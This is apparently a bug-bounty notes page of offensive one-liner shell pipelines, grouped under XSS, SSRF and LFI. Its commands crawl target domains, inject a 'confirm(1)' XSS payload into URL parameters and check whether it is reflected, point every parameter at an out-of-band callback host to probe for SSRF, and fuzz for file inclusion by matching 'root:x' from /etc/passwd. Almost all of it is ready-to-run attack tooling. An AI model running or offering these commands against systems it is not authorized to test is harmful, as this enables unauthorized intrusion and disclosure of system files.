one line script

GitHub - dwisiswant0/awesome-oneliner-bugbounty: A collection of awesome one-liner scripts especially for bug bounty tips.GitHub

XSS

gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee result.txt

cat bofeb.txt | grep "=" | egrep -iv ". (jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|s vg|txt|js)" | qsreplace '">confirm(1)' | tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "confirm(1)" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n"; done

waybackurls testphp.vulnweb.com | tee testphp1.txt | grep "=" | egrep -iv ". (jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|s vg|txt|js)" | qsreplace '">confirm(1)' | tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "confirm(1)" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n"; done

echo https://google.com | hakrawler -subs >> google.txt |cat google.txt | grep "=" | egrep -iv ". (jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|s vg|txt|js)" | qsreplace '">confirm(1)' | tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "confirm(1)" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n"; done

SSRF

findomain -t example.com -q | httpx -silent -threads 1000 | gau | grep “=” | qsreplace http://YOUR.burpcollaborator.net

LFI

findomain -t example.com -q | waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done

PreviousPython Nextmore

Last updated 2 years ago